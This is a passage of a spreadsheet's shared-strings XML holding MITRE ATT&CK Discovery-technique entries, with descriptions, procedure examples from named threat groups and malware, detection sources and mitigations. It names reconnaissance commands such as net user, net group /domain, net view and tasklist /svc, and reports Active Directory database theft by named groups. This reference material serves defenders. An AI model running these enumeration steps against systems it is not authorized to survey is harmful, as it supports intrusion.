    <t>[[Group/G0060|BRONZE BUTLER]] has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0055|RARSTONE]] obtains installer properties from Uninstall Registry Key entries to obtain information about installed applications and how to uninstall certain applications.[[CiteRef::Camba RARSTONE]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] uses command-line interaction to search files and directories.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] identifies the file path for the %TEMP% director and sets its current working directory to that path.[[CiteRef::Palo Alto menuPass Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can enumerate and search for files and directories.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]][[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0131|TINYTYPHON]] searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] scans the victim for files that contain certain keywords from a list that is obtained from the C2 as a text file. It also collects information about installed software.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] collects the victim's %TEMP% directory path and version of Internet Explorer.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>can list directories on a victim.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>can search files on a victim.[[CiteRef::US-CERT FALLCHILL Nov 2017]]</t>
  </si>
  <si>
    <t>Several [[Group/G0032|Lazarus Group]] malware samples use a common function to identify target files by their extension. [[Group/G0032|Lazarus Group]] malware families also enumerate files and directories on lettered drives.[[CiteRef::Novetta Blockbuster]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>A variant of [[Software/S0081|Elise]] executes &lt;code&gt;dir C:\progra~1&lt;/code&gt; when initially run.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0059|WinMM]] sets a WH_CBT Windows hook to search for and capture files on the victim.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>A [[Group/G0040|Patchwork]] payload has searched all fixed drives on the victim for files matching a specified list of extensions.[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>[[Software/S0066|3PARA RAT]] has a command to retrieve metadata for files on disk as well as a command to list the current working directory.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] searches victim drives for files matching certain extensions (?.skr?,?.pkr? or ?.key?) or names.[[CiteRef::ESET Sednit USBStealer 2014]][[CiteRef::Kaspersky Sofacy]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] can list files and directories.[[CiteRef::ESET Sednit Part 2]][[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>An older version of [[Software/S0023|CHOPSTICK]] has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0065|4H RAT]] has the capability to obtain file and directory listings.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has a utility to list detailed information about files and directories [[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Software/S0129|AutoIt backdoor]] is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can scan victim drives to look for specific banking software on the machine to determine next actions. It also looks at browsing history and open tabs for specific strings.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0049|GeminiDuke]] collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Software/S0035|SPACESHIP]] identifies files and directories for collection by searching for specific file extensions or file modification time.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0034|NETEAGLE]] allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0036|FLASHFLOOD]] searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may enumerate user directories on a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0157|SOUNDBITE]] is capable of enumerating and manipulating files and directories.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0031|BACKSPACE]] allows adversaries to search for files.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0048|PinchDuke]] searches for files created within a certain timeframe and whose file extension matches a predefined list.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0050|CosmicDuke]] searches attached and mounted drives for file extensions and keywords that match a predefined list.[[CiteRef::F-Secure Cosmicduke]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that looks for files and directories on the local file system.[[CiteRef::FireEye Clandestine Fox]] [[CiteRef::evolution of pirpi]]</t>
  </si>
  <si>
    <t>[[Software/S0063|SHOTPUT]] has a command to obtain a directory listing.[[CiteRef::Palo Alto CVE-2015-3113 July 2015]]</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used &lt;code&gt;sc query&lt;/code&gt; on a victim to gather information about services.[[CiteRef::Palo Alto OilRig May 2016]]</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</si>
  <si>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information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1007</t>
  </si>
  <si>
    <t>The &lt;code&gt;net start&lt;/code&gt; command can be used in [[Software/S0039|Net]] to find information about Windows services.[[CiteRef::Savill 1999]]</t>
  </si>
  <si>
    <t>Software: Tasklist</t>
  </si>
  <si>
    <t>[[Software/S0057|Tasklist]] can be used to discover services running on a system.[[CiteRef::Microsoft Tasklist]]</t>
  </si>
  <si>
    <t>After compromising a victim, [[Group/G0033|Poseidon Group]] discovers all running services.[[CiteRef::Kaspersky Poseidon Group]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] performs service discovery using &lt;code&gt;net start&lt;/code&gt; commands.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0086|ZLib]] has the ability to discover and manipulate Windows services.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] runs the command &lt;code&gt;net start&lt;/code&gt; on a victim.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0082|Emissary]] has the capability to execute the command &lt;code&gt;net start&lt;/code&gt; to interact with services.[[CiteRef::Emissary Trojan Feb 2016]]</t>
  </si>
  <si>
    <t>queries the system to identify existing services.[[CiteRef::US-CERT Volgmer Nov 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] executes &lt;code&gt;net start&lt;/code&gt; after initial communication is made to the remote server.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] surveys a system upon check-in to discover running services and associated processes using the &lt;code&gt;tasklist /svc&lt;/code&gt; command.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>The &lt;code&gt;net time&lt;/code&gt; command can be used in [[Software/S0039|Net]] to determine the local or remote system time.[[CiteRef::TechNet Net Time]]</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,API monitoring</t>
  </si>
  <si>
    <t>Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software. ,</t>
  </si>
  <si>
    <t>Benign software uses legitimate processes to gather system time. Efforts should be focused on preventing unwanted or unknown code from executing on a system. Some common tools, such as net.exe, may be blocked by policy to prevent common ways of acquiring remote system time.
Identify unnecessary system utilities or potentially malicious software that may be used to acquire system time information,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1124</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about peripheral devices,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1120</t>
  </si>
  <si>
    <t>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.[[CiteRef::MSDN System Time]][[CiteRef::Technet Windows Time Service]]
An adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with [[Software/S0039|Net]] on Windows by performing &lt;code&gt;net time \\hostname&lt;/code&gt; to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using &lt;code&gt;w32tm /tz&lt;/code&gt;.[[CiteRef::Technet Windows Time Service]] The information could be useful for performing other techniques, such as executing a file with a [[Technique/T1053|Scheduled Task]][[CiteRef::RSA EU12 They're Inside]], or to discover locality information based on time zone to assist in victim targeting.</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] surveys a system upon check-in to discover the system time by using the &lt;code&gt;net time&lt;/code&gt; command.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system or domain accounts. 
===Windows===
Example commands that can acquire this information are &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net group &lt;groupname&gt;&lt;/code&gt;, and &lt;code&gt;net localgroup &lt;groupname&gt;&lt;/code&gt; using the [[Software/S0039|Net]] utility or through use of [[Software/S0105|dsquery]]. If adversaries attempt to identify the primary user, currently logged in user, or set of users that commonly uses a system, [[Technique/T1033|System Owner/User Discovery]] may apply.
===Mac===
On Mac, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands. In mac specifically, &lt;code&gt;dscl . list /Groups&lt;/code&gt; and &lt;code&gt;dscacheutil -q group&lt;/code&gt; can also be used to enumerate groups and users.
===Linux===
On Linux, local users can be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file which is world readable. In mac, this same file is only used in single-user mode in addition to the &lt;code&gt;/etc/master.passwd&lt;/code&gt; file.
Also, groups can be enumerated through the &lt;code&gt;groups&lt;/code&gt; and &lt;code&gt;id&lt;/code&gt; commands. In mac specifically, &lt;code&gt;dscl . list /Groups&lt;/code&gt; and &lt;code&gt;dscacheutil -q group&lt;/code&gt; can also be used to enumerate groups and users.</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can obtain the victim time zone.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>The &lt;code&gt;net view \\remotesystem&lt;/code&gt; and &lt;code&gt;net share&lt;/code&gt; commands in [[Software/S0039|Net]] can be used to find shared drives and directories on remote and local systems respectively.[[CiteRef::Savill 1999]]</t>
  </si>
  <si>
    <t>Process Monitoring,Process command-line parameters,Network protocol analysis,Process use of network</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</si>
  <si>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related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used.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[[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>macOS,Windows</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1135</t>
  </si>
  <si>
    <t>[[Group/G0035|Dragonfly]] identified and browsed file servers on the victim network, viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.[[CiteRef::US-CERT APT Energy Oct 2017]]</t>
  </si>
  <si>
    <t>listed remote shared drives that were accessible from a victim.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>discovers shares on the network [[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can query shared drives on the local system.[[CiteRef::Cobalt Strike TTPs Dec 2017]]</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system or domain-level groups and permissions settings. 
===Windows===
Examples of commands that can list groups are &lt;code&gt;net group /domain&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; using the [[Software/S0039|Net]] utility.
===Mac===
On Mac, this same thing can be accomplished with the &lt;code&gt;dscacheutil -q group&lt;/code&gt; for the domain, or &lt;code&gt;dscl . -list /Groups&lt;/code&gt; for local groups.
===Linux===
On Linux, local groups can be enumerated with the &lt;code&gt;groups&lt;/code&gt; command and domain groups via the &lt;code&gt;ldapsearch&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about groups and permissions,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1069</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
===Windows===
Example commands and utilities that obtain this information include &lt;code&gt;ver&lt;/code&gt;, [[Software/S0096|Systeminfo]], and &lt;code&gt;dir&lt;/code&gt; within [[Software/S0106|cmd]] for identifying information based on present files and directories.
===Mac===
On Mac, the &lt;code&gt;systemsetup&lt;/code&gt; command gives a detailed breakdown of the system, but it requires administrative privileges. Additionally, the &lt;code&gt;system_profiler&lt;/code&gt; gives a very detailed breakdown of configurations, firewall rules, mounted volumes, hardware, and many other things without needing elevated permissions.</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
===Windows===
An example command that would obtain details on processes is "tasklist" using the [[Software/S0057|Tasklist]] utility.
===Mac and Linux===
In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command.</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</si>
  <si>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that look like process discovery may be uncommon, depending on the environment and how they are used.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[[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Administrator, SYSTEM may provide better process ownership details</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1057</t>
  </si>
  <si>
    <t>Security Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
===Windows===
Example commands that can be used to obtain security software information are [[Software/S0108|netsh]], &lt;code&gt;reg query&lt;/code&gt; with [[Software/S0075|Reg]], &lt;code&gt;dir&lt;/code&gt; with [[Software/S0106|cmd]], and [[Software/S0057|Tasklist]], but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.
===Mac===
It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.</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</si>
  <si>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[[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about local security software,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1063</t>
  </si>
  <si>
    <t>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. 
===Windows===
Example utilities used to obtain this information are &lt;code&gt;dir&lt;/code&gt; and &lt;code&gt;tree&lt;/code&gt;.[[CiteRef::Windows Commands JPCERT]] Custom tools may also be used to gather file and directory information and interact with the Windows API.
===Mac and Linux===
In Mac and Linux, this kind of discovery is accomplished with the &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt; commands.</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.[[CiteRef::Wikipedia Windows Registry]] Some of the information may help adversaries to further their operation within a network.</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters</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</si>
  <si>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Interaction with the Windows Registry may come from the command line using utilities such as [[Software/S0075|Reg]] or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [[Technique/T1047|Windows Management Instrumentation]] and [[Technique/T1086|PowerShell]]. ,</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1012</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [[Software/S0099|Arp]], [[Software/S0100|ipconfig]]/[[Software/S0101|ifconfig]], [[Software/S0102|nbtstat]], and [[Software/S0103|route]].</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about a system's network configuration,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1016</t>
  </si>
  <si>
    <t>Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [[Software/S0057|Tasklist]], and "net start" using [[Software/S0039|Net]], but adversaries may also use other tools as well.</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
In Mac, this can be done natively with a small [[Technique/T1155|AppleScript]] script.</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1010</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</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</si>
  <si>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from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans. ,</t>
  </si>
  <si>
    <t>Use network intrusion detection/prevention systems to detect and prevent remote service scans. Ensure that unnecessary ports and services are closed and proper network segmentation is followed to protect critical servers and devices.
Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about services running on remote systems,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1046</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
===Windows===
Utilities and commands that acquire this information include [[Software/S0104|netstat]], "net use," and "net session" with [[Software/S0039|Net]].
===Mac and Linux ===
In Mac and Linux, &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session".</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about network connections,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1049</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Adversaries will likely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 
===Windows===
Examples of tools and commands that acquire this information include "ping" or "net view" using [[Software/S0039|Net]].
===Mac===
Specific to Mac, the &lt;code&gt;bonjour&lt;/code&gt; protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems.
===Linux===
Utilities such as "ping" and others can be used to gather information about remote systems.</t>
  </si>
  <si>
    <t>Network protocol analysis,Process command-line parameters,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information on remotely available systems,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1018</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>===Windows===
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [[Technique/T1003|Credential Dumping]]. The information may be collected in a number of different ways using other [[Discovery]] techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.
===Mac===
On Mac, the currently logged in user can be identified with &lt;code&gt;users&lt;/code&gt;,&lt;code&gt;w&lt;/code&gt;, and &lt;code&gt;who&lt;/code&gt;.
===Linux===
On Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users,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</si>
  <si>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https://attack.mitre.org/wiki/Technique/T1033</t>
  </si>
  <si>
    <t>[[Group/G0018|admin@338]] actors used the following command following exploitation of a machine with [[Software/S0042|LOWBALL]] malware to obtain information about services: &lt;code&gt;net start &gt;&gt; %temp%\download&lt;/code&gt;[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] uses a module to receive a notification every time a USB mass storage device is inserted into a victim.[[CiteRef::Microsoft SIR Vol 19]] They have also looked for the presence of iOS devices by looking for their backups [[CiteRef::XAgentOSX]].</t>
  </si>
  <si>
    <t>[[Software/S0136|USBStealer]] monitors victims for insertion of removable drives. When dropped onto a second victim, it also enumerates drives connected to the system.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] can list connected devices.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Group/G0047|Gamaredon Group]] tools contained an application to check performance of USB flash drives.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0020|Equation]] contains functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.[[CiteRef::Kaspersky Equation QA]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can obtain a list of smart card readers attached to the victim.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0128|BADNEWS]] checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0049|GeminiDuke]] collects information on programs and services on the victim that are configured to automatically run at startup.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the showBackupIosFolder function to check for IOS device backups by running &lt;code&gt;ls -la ~/Library/Application\ Support/MobileSync/Backup/&lt;/code&gt;.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has used &lt;code&gt;net user&lt;/code&gt; to conduct internal discovery of systems.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] performs account discovery using commands such as &lt;code&gt;net localgroup administrators&lt;/code&gt; and &lt;code&gt;net group "REDACTED" /domain&lt;/code&gt; on specific permissions groups.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] executes &lt;code&gt;net user&lt;/code&gt; after initial communication is made to the remote server.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] may create a file containing the results of the command &lt;code&gt;cmd.exe /c net user {Username}&lt;/code&gt;.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] has used Metasploit?s [[Software/S0029|PsExec]] NTDSGRAB module to obtain a copy of the victim's Active Directory database.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0085|S-Type]] runs the command &lt;code&gt;net user&lt;/code&gt; on a victim. [[Software/S0085|S-Type]] also runs tests to determine the privilege level of the compromised user.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can obtain a list of users.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0033|Poseidon Group]] searches for administrator accounts on both the local victim machine and the network.[[CiteRef::Kaspersky Poseidon Group]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used the Microsoft administration tool csvde.exe to export Active Directory data.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has run &lt;code&gt;net user&lt;/code&gt;, &lt;code&gt;net user /domain&lt;/code&gt;, &lt;code&gt;net group ?domain admins? /domain&lt;/code&gt;, and &lt;code&gt;net group ?Exchange Trusted Subsystem? /domain&lt;/code&gt; to get account listings on a victim.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] has commands to get the time the machine was built, the time, and the time zone.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
===Windows===
File sharing over a Windows network occurs over the SMB protocol.[[CiteRef::Wikipedia Shared Resource]][[CiteRef::TechNet Shared Folder]]
[[Software/S0039|Net]] can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;.
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for [[Collection]] and to identify potential systems of interest for [[Lateral Movement]].
===Mac===
On Mac, locally mounted shares can be viewed with the &lt;code&gt;df -aH&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] has used &lt;code&gt;net time&lt;/code&gt; to check the local time on a target system.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process.[[CiteRef::Novetta Blockbuster Loaders]] The KilaAlfa keylogger also reports the title of the window in the foreground.[[CiteRef::Novetta Blockbuster Tools]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] can enumerate registry keys.[[CiteRef::ESET Sednit Part 2]][[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] has a command to get text of the current foreground window.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0157|SOUNDBITE]] is capable of enumerating application windows.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the getInfoOSX function to return the OS X version as well as the current user.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] has commands to get the current user's name and SID.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has queried information on machines to determine the current user or system owner [[CiteRef::XAgentOSX]].</t>
  </si>
  <si>
    <t>The OsInfo function in [[Software/S0162|Komplex]] collects the current running username.[[CiteRef::Sofacy Komplex Trojan]]</t>
  </si>
  <si>
